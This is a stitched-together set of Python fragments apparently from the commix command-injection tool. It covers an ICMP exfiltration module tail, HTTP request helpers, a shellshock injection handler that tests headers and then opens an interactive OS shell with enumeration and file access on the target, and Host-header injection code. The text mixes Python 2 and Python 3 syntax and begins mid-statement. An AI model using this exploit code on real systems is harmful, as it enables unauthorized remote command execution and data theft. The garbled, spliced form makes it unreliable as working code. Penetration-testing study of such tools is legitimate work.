str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str( err_msg.code) == settings.BAD_REQUEST: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print("\n" + settings.print_critical_msg(err)) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: os._exit(0) else: try: response = _urllib.request.urlopen(request, timeout=settings.TIMEOUT) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str( err_msg.code) == settings.BAD_REQUEST: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print("\n" + settings.print_critical_msg(err)) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: os._exit(0) if settings.TARGET_OS == "win": err_msg = "This module's payloads are not suppoted by " err_msg += "the identified target operating system." print(settings.print_critical_msg(err_msg) + "\n") os._exit(0) else: technique = "ICMP exfiltration module" info_msg = "Loading the " + technique + ". \n" sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() ip_data = menu.options.ip_icmp_data # Source IP address ip_src = re.findall(r"ip_src=(.*),", ip_data) ip_src = ''.join(ip_src) # Destination IP address ip_dst = re.findall(r"ip_dst=(.*)", ip_data) ip_dst = ''.join(ip_dst) exploitation(ip_dst, ip_src, url, http_request_method, vuln_parameter, technique)
def get_request_response(request): if settings.REVERSE_TCP == False and settings.BIND_TCP == False: headers.check_http_traffic(request) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print("") if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err)) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except _urllib.error.URLError as err_msg: if "Connection refused" in err_msg.reason: err_msg = "The target host is not responding. " err_msg += "Please ensure that is up and try again." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print("") if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err_msg)) raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print("") if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err)) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except _urllib.error.URLError as err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err_msg)) raise SystemExit() else: try: response = _urllib.request.urlopen(request) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: if not str(err_msg.code) == str(menu.options.ignore_code): err = str(err_msg) + "." # if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ # settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: # print "f" # elif settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: # print "s" if settings.VERBOSITY_LEVEL < 2: print("\r" + settings.print_critical_msg(err) + 30 * " ") continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except _urllib.error.URLError as err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err_msg)) raise SystemExit() else: response = headers.check_http_traffic(request) return response
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" info_msg = "Testing the " + technique + "... " if settings.VERBOSITY_LEVEL > 1: info_msg = info_msg + "\n" sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: sys.stdout.write("\n" + settings.print_payload(payload)) elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print settings.print_info_msg(info_msg) print settings.print_payload(payload) header = {check_header : payload} request = urllib2.Request(url, None, header) if check_header == "User-Agent": menu.options.agent = payload else: menu.options.agent = default_user_agent log_http_headers.do_check(request) log_http_headers.check_http_traffic(request) # Check if defined any HTTP Proxy. if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor. elif menu.options.tor: response = tor.use_tor(request) else: response = urllib2.urlopen(request) percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False elif len(response.info()) > 0 and cve in response.info(): percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False elif len(response.read()) > 0 and cve in response.read(): percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False else: percent = str(float_percent )+ "%" if not settings.VERBOSITY_LEVEL >= 1: info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if no_result == False: # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) vuln_parameter = "HTTP Header" the_type = " " + vuln_parameter check_header = " " + check_header vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload) check_header = check_header[1:] logs.update_payload(filename, counter, payload) if settings.VERBOSITY_LEVEL >= 1: checks.total_of_requests() success_msg = "The (" + check_header + ") '" success_msg += url + Style.RESET_ALL + Style.BRIGHT success_msg += "' seems vulnerable via " + technique + "." if settings.VERBOSITY_LEVEL <= 1: print "" print settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL # Enumeration options. if settings.ENUMERATION_DONE == True : if settings.VERBOSITY_LEVEL >= 1: print "" while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) enumerate_again = sys.stdin.readline().replace("\n","").lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "y" if enumerate_again in settings.CHOICE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOICE_NO: break elif enumerate_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True : while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline().replace("\n","").lower() else: file_access_again= "" if len(file_access_again) == 0: file_access_again = "y" if file_access_again in settings.CHOICE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell, payload = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL raise SystemExit() else: # Pseudo-Terminal shell print "" go_back = False go_back_again = False while True: if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace("\n","").lower() else: gotshell= "" if len(gotshell) == 0: gotshell= "y" if gotshell in settings.CHOICE_YES: if not menu.options.batch: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: if not readline_error: # Tab compliter readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again) if go_back: break else: shell, payload = cmd_exec(url, cmd, cve, check_header, filename) if shell != "": # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, shell) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: info_msg = "Executing the '" + cmd + "' command... " if settings.VERBOSITY_LEVEL == 1: sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)+ "\n") elif settings.VERBOSITY_LEVEL > 1: sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)+ "\n") err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_critical_msg(err_msg) + "\n" except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print settings.print_error_msg(err_msg) raise except: info_msg = "Testing the " + technique + "... " if settings.VERBOSITY_LEVEL > 1: info_msg = info_msg + "\n" sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() break elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) continue break else: continue if no_result and settings.VERBOSITY_LEVEL < 2: print "" except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print "\n" + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit()
def host_injection(url, vuln_parameter, payload): payload = urlparse(url).netloc + payload def inject_host(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) # Check if defined POST data if menu.options.data: menu.options.data = settings.USER_DEFINED_POST_DATA request = urllib2.Request(url, menu.options.data) else: url = parameters.get_url_part(url) request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) payload = checks.newline_fixation(payload) request.add_header('Host', payload) try: headers.check_http_traffic(request) response = opener.open(request) return response except ValueError: pass if settings.TIME_RELATIVE_ATTACK : start = 0 end = 0 start = time.time() proxy = None #response = inject_host(url, vuln_parameter, payload, proxy) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy = urllib2.ProxyHandler({settings.SCHEME : menu.options.proxy}) response = inject_host(url, vuln_parameter, payload, proxy) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print("") if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err)) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err_msg)) raise SystemExit()